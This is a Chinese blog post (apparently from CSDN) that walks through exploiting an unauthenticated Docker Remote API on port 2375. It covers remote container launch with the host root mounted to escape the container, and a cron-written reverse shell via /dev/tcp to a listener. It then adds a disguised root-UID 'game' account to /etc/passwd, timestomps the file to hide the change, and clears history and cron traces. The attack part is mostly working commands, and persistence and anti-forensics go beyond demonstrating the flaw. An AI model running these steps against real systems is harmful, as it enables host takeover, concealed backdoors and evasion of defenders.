docker未授权rce+docker逃逸复现

最新推荐文章于 2024-03-15 10:53:50 发布
最新推荐文章于 2024-03-15 10:53:50 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: 渗透测试 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54227009/article/details/130808298
版权

docker未授权rce+docker逃逸复现

前言:这段时间跟着bnessy师傅一起打内网,跟着bnessy师傅也学到了很多有用的姿势,这里就来复现几个内网的漏洞(大佬轻喷)

1、老规矩,还是fscan扫到的漏洞

 

通过访问:http://xxxx:2375/version

如果能够访问,则漏洞存在

 

1.2访问:http://xxxx:2375/info

发现存在未授权页面

 

2、在kali上安装docker,可以获取目标机正在运行的docker镜像文件

命令如下

docker -H tcp://目标机ip:2375 images

 

3、随便选一个目标机器有的容器,以/bin/bash的方式进入该容器

命令如下:

/:/mnt:意思是将目标机的根目录挂载到该容器的/mnt目录下,所以我们要查询目标机的文件的话,最前面应该跟个/mnt的目录, #如要查询目标机的passwd,则目录为:/mnt/etc/passwd

docker -H tcp://目标机ip:2375 run -it -v /:/mnt 镜像id /bin/bash

 

3.1、进入/mnt目录下即可逃逸到宿主机

 

4、利用计划任务,写反弹shell

 

命令如下:

echo '* * * * * /bin/bash -i >& /dev/tcp/目标机ip/监听端口 0>&1' >> /mnt/var/spool/cron/root

注意:在centos中,计划任务的默认路径是:/var/spool/cron/

但在ubuntu系统中,计划任务默认是:/var/spool/cron/crontabs/

/mnt/var/spool/cron/root

这里的root是指计划任务以什么用户去执行,这里用root,反弹回来的shell也是root权限

这里shell反弹回来大概要等一分钟左右

 

5、权限维持

该系统为linux,所以权限维持的思路如下:

  • 查看当前有哪些用户,新建个类似的用户名进行混淆

可以看见有个games的用户,我们这里可以创建个game的用户来进行混淆

 

步骤如下:

  • 修改/etc/passwd

  • 增加game用户

5.1查看/etc/passwd,将root这一行先copy出来

/etc/passwd 各部分含义:
用户名:密码:用户ID:组ID:身份描述:用户的家目录:用户登录后所使用的SHELL
root:x:0:0:root:/root:/bin/bash

5.2使用perl -le 'print crypt("Jilei","salt")'生成一个密码,Jilei为密码:

perl -le 'print crypt("Jilei","salt")'

这里我用的xiaosedi为密码

将生成出来的密码copy出来,替换掉刚刚copy的root那一串

 

将改变后的这一串添加到/etc/passwd中

 

添加成功

 

用vim把刚刚增加的game用户换到games的下一行去进行隐藏

 

5.3利用touch命令将/etc/passwd文件的修改时间改成跟/etc/shadow一样

 

 

touch -r /etc/shadow /etc/passwd

6、痕迹清除

 

  • 将我们的定时任务给清除掉

     

  • 清除历史命令

    history -c
鸡肋是鸡肋!
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Docker+Jenkins+GitLab+Maven+SpringBoot自动化构建.pdf
09-30
Docker+Jenkins+GitLab+Maven+SpringBoot&SpringCloud;自动化构建
基于kubernetes+docker+jenkins的DevOps实践
01-27
之前自己的项目开发就搭了个cicd的环境,那时候是在本就小的可怜的服务器上搭了一套 jenkins+dockerregistry+docker 见之前的笔记 总的差不多这样:之后对kubernetes的接触后,就在之前的基础上加入kubernetes,其实也就是在服务器拉取镜像docker
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 1785
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
Docker+Jenkins+GitLab+Maven+Harbor+SpringBoot自动化构建
06-10
1. Docker+Jenkins+GitLab+Maven+Harbor+SpringBoot自动化构建+Jenkins自动化部署配置 2.无须运维部署 ,而是相关的开发人员,测试人员登录jenkins传入需要部署的tag即可,整个部署过程无须运维参与,解放运维劳动力
Docker 系统性入门+进阶实践视频教程.zip
07-13
目录网盘文件永久链接 第1章 Docker的安装和介绍 试看 第2章 容器快速上手 第3章 镜像的创建管理和发布 第4章 Dockerfile完全指南 第5章 Docker的存储 第6章 Docker的网络 第7章 Docker compose 第8章 Docker swarm 第9章 Docker vs podman 第10章 Docker的多架构支持 第11章 Git和容器——CI-CD 第12章 容器安全 第13章 课程内容回顾与进阶建议
K8S+DockerCE+Jenkins+Maven+Gitlab自动化打包部署
09-30
K8S+DockerCE+Jenkins+Maven+Gitlab自动化打包部署
docker api授权导致rce 漏洞修复
core815的专栏
05-26 1394
docker api授权导致rce 漏洞修复
漏洞复现 - - -Docker授权访问漏洞
weixin_67503304的博客
08-16 4800
Docker授权访问漏洞docker授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
Docker Remote Api授权访问漏洞
Seth为理想奋斗
06-17 3033
一. 漏洞原因 dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375 docker守护进程监听在0.0.0.0,外网可访问 3, 没有使用iptables等限制可连接的来源ip二. 漏洞利用1.远程对被攻击的主机的docker容器进行操作docker -H tcp://remoteip:2375 images 远程启动被攻击主机的docker
Docker授权攻击利用复现
echoonly1999的博客
08-31 274
环境配置 受害机:CentOS 攻击者:kali 配置docker配置文件,使得测试机存在授权访问 vim /usr/lib/systemd/system/docker.service 原本[Service] ExecStart参数 修改为 ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock 重启docker服务 systemctl daemon-reload systemctl restart d
漏洞复现-docker-unauthorized-rce
qq_59350385的博客
06-27 5933
一、漏洞介绍1.1漏洞成因 docker remote API授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展2.2环境准备 靶机环境:192.168.xx.xxx (ubuntu) 攻击环境:192.168.xx.xxx (kali) 在靶机上使用复现漏洞环境。 vulhub官网地址:https://vulhub.org 二、漏洞检测直接输入地址 ;若能访
Docker授权访问漏洞复现
m0_43397796的博客
12-13 2869
docker授权访问是怎么回事呢?docker授权访问是怎么回事相信大家都很熟悉,但是docker授权访问是怎么回事呢,下面就让小编带大家一起了解吧。 docker授权访问是怎么回事,其实就是docker授权访问是怎么回事,大家可能会很惊讶docker授权访问怎么会是这么回事呢?但事实就是这样,小编也感到非常惊讶。 这就是关于docker授权访问是怎么回事的事情了,大家有什么想法呢,欢迎在评论区告诉小编一起讨论哦!...
云安全笔记-Docker daemon api 授权访问漏洞复现及利用
NoooEmotion的博客
02-07 1302
授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
Docker API授权漏洞复现
crowsec
01-27 3965
如果在docker上配置了远程访问docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,如果没有做限制的话,攻击者就可以通过Docker授权来控制服务器 扫取二维码获取更多信息! 微信公众号:乌鸦安全 扫取二维码获取更多信息!
Docker授权漏洞复现(合天网安实验室)
weixin_51151498的博客
11-29 1267
Docker授权漏洞复现(合天网安实验室)
Docker授权访问漏洞(www.hetianlab.com)
懂进攻知防守
07-20 3200
Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。Docker Daemon把服务暴露在tcp的2375端口上,这样就可以在网络上操作Docker了。Docker本身没有身份认证的功能,只要网络上能访问到服务端口,就可以操作Docker。...
验证docker的Redis镜像也存在授权访问漏洞
12-04 237
看到了这篇老外的博客:Over 30% of Official Images in Docker Hub Contain High Priority Security Vulnerabilities 于是,结合最近爆出的redis授权访问导致可远程获得服务器权限漏洞,在docker容器中验证官方pull的镜像是否存在漏洞。 我的docker安装...
关于docker remote api授权访问漏洞的学习与研究
07-16 612
漏洞介绍: 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个api url输入ip:2375/version就会列出基本信息,和docker vers...
Docker Daemon API授权访问RCE
Fly_鹏程万里
12-24 3009
影响范围 Docker ALL 漏洞类型 授权访问类 利用条件 REST API外置 漏洞概述 Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行 漏洞复现 环境搭建 下载环境 mkdir docker cd docker wget https://raw.githubusercontent.com/vulhub/vulhub/master/d..
docker-ce18+
最新发布
04-04
Docker CE(Community Edition)是Docker的免费版本,它是一个开源的容器化平台,用于构建、发布和运行应用程序。Docker CE 18+是指Docker CE的18版本及以上的版本。 Docker CE 18+的主要特性包括: 1. 容器化:Docker CE可以将应用程序及其依赖项打包到一个独立的容器中,使得应用程序可以在任何环境中运行,无需担心环境差异性。 2. 轻量级:Docker容器相比于传统的虚拟机更加轻量级,启动速度更快,资源占用更少。 3. 可移植性:Docker容器可以在不同的平台上运行,包括物理机、虚拟机、云服务等。 4. 简化部署:使用Docker CE可以简化应用程序的部署过程,通过定义Dockerfile来描述应用程序的环境和依赖关系,使得部署变得更加可靠和可重复。 5. 弹性伸缩:Docker CE可以根据应用程序的负载情况进行弹性伸缩,根据需要增加或减少容器的数量。 6. 网络隔离:每个Docker容器都有自己的网络命名空间,可以实现容器之间的网络隔离,提高应用程序的安全性。 7. 容器编排:Docker CE可以与容器编排工具(如Docker Swarm和Kubernetes)结合使用,实现容器的自动化管理和调度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值